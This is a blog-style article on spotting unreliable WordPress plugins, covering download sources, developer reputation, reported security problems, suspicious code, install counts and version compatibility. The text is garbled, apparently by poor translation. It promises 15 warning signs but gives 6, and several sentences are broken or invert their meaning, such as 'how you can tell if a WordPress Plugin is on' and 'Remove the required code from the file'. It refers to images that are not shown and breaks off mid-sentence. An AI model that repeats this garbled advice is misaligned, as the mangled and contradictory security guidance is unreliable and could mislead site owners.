Even the smallest and simplest of WordPress sites need plugins. Akismet is a must if the site has a blog. A security plugin like Defender is not negotiable. And one Contact form solid is necessary if you intend to collect leads.
For the most part, however, we know that these WordPress plugins commonly used and referenced are reliable. They come with millions of downloads, high ratings, and plugin developers who have worked hard to build a positive reputation in the community by creating error-free plugins and providing top-notch support.
But what about everything else? How do you know if this WordPress Plugin apparently popular (which would really do wonders for your site) is reliable? With plugins, unfortunately, responsible for a high percentage of security breaches (Wordfence put that number at 55,9%), it's scary to think that any decision you make to use one is a dangerous gamble.
What I would like to do now is talk about how you can tell if a WordPress Plugin is on. Specifically, I'm going to share 15 warning signs you should watch out for that will let you know when it's best not to download one.
6 warning signs that a WordPress plugin is unreliable
I still feel bad for putting that review on the WordPress plugins because, really, they are awesome. When coded well and properly managed, they can do wonderful things inside WordPress. But unfortunately this is not always the case.
Sometimes you get a plugin that was made by a newbie developer hoping to make money, but didn't put in the time to code and maintain it. There are also times when you come across a plugin that is well coded, but the wrong line of code conflicts with another plugin and breaks your entire site in an instant. And, of course, there is always the risk of a hacker or bogus WordPress developer getting their hands on it.
So that means you have to be extra vigilant about who you let in, even if the original developer's intentions were good.
In order to be diligent, you need to know how to spot the warning signs of a bad WordPress Plugin. Start by using a verification system to make sure the plugin is the right one for your site. Then you can start digging deeper to see if you can spot any of the warning signs.
1. The plugins repository seems strange
Let's start with where you hunt these WordPress plugins. For example, say you were interested in finding a plugin that adds a feature that isn't too mundane. You do a Google search for the feature and the top results direct you to a number of independent WordPress developer sites that claim to sell a plugin that does just that.
A few warning bells should be ringing in your head, then. Although that doesn't mean that the plugin's source cannot be trusted if you land on the site and it looks like it was built in the early 00s and there is no way to contact the developer except through an AOL email address… well, that's a huge red flag.
In general, always look for WordPress plugins that come from trusted sources. Start with:
- The repository of WordPress plugins
- Plugin markets like CodeCanyon
- Developer sites of WordPress plugins like WPMU DEV
If you start there, you will greatly reduce the chances of falling on a bad apple during your travels.
2. A reputation as a tarnished developer
Next, look at the reputation of the plugin developer. You don't necessarily need to know who the person is, where they live, what their education is, or anything else (unless you're curious). What you're looking for here are red flags telling you that something is wrong.
Here are some of the warning signs:
- They are a new owner of the plugin and don't have a background as a developer, which could mean that they have purchased a plugin popular enough to use as a vehicle to inject malicious code into websites.
- A Google search of their name yields no results. Not even their own WordPress site.
- Or, a Google search of their name returns results, but you see things like “Don't believe [developer's name]” or “[developer's name] is a fraud. "
- By clicking on their name in the WordPress repository or on the CodeCanyon Marketplace, a website that is seriously obsolete and generates its own red flags appears.
The good thing about CodeCanyon Marketplace is that it provides status and rewards for plugin authors based on sales, accomplishments, and reviews. So if you are really worried about who the person or team behind the plugin is, you can explore the author's profile.
3. The plugin is considered dangerous
Of course, you should also look into the reputation of the WordPress plugin itself. Like I said earlier sometimes the developer didn't even want to introduce bad code into the plugin or they were just too new to learn more. So even if they have a squeaky image, the plugin may not be.
There are a number of things you can check that will help you verify the security of a WordPress plugin, but for this one I want to focus on the explicit mentions that a plugin is not trusted for. a use. This means going to Google and looking for words like "dangerous", "hacked", and "compromised" in conjunction with the name of the plugin. If you see results that prove security concerns, walk away.
4. The code seems suspicious
This one might not be the easiest to check since not everyone knows how to write code for a plugin. However, if you are familiar enough with the structure and guidelines of the file, you can at least verify that all the essentials are in place.
You can use the Codex WordPress Guide for write a plugin to do this. Remove the required code from the file and focus on what's left. If anything looks suspicious to you, go out there and find a new plugin.
5. Not enough downloads
On WordPress, you will be able to see the number of active installations:
This is great because you don't just see the number of people who have downloaded and deleted the plugin. This is the number of websites currently installed, which is a good indicator of reliability.
Plugin markets include numbers like total sales, which are good too, although you would have to rely on other data to confirm that they really mean something:
In general, I suggest avoiding WordPress plugins with less than 1000 downloads. Really you should want a number higher than that (probably over 5000), but sometimes that isn't possible if it's a brand new feature that hasn't worked yet or a plugin that supports something that doesn't. is not commonly used. But it also depends on whether the plugin is recent or not.
6. Incompatible with the latest version of WordPress
When reviewing WordPress plugins in the repository, there are two stats you should look at when it comes to the WordPress version:
The "Requires WordPress Version" field will allow you to know how far your WordPress version can go in order to work properly with the plugin. That said, you should never let your site run on an older version of WordPress.
“Tested to” is the other field to look at here. This will tell you if it is compatible with the latest base update. If the plugin has not yet been updated to the latest version, ignore it.
And, if you see this message, run:
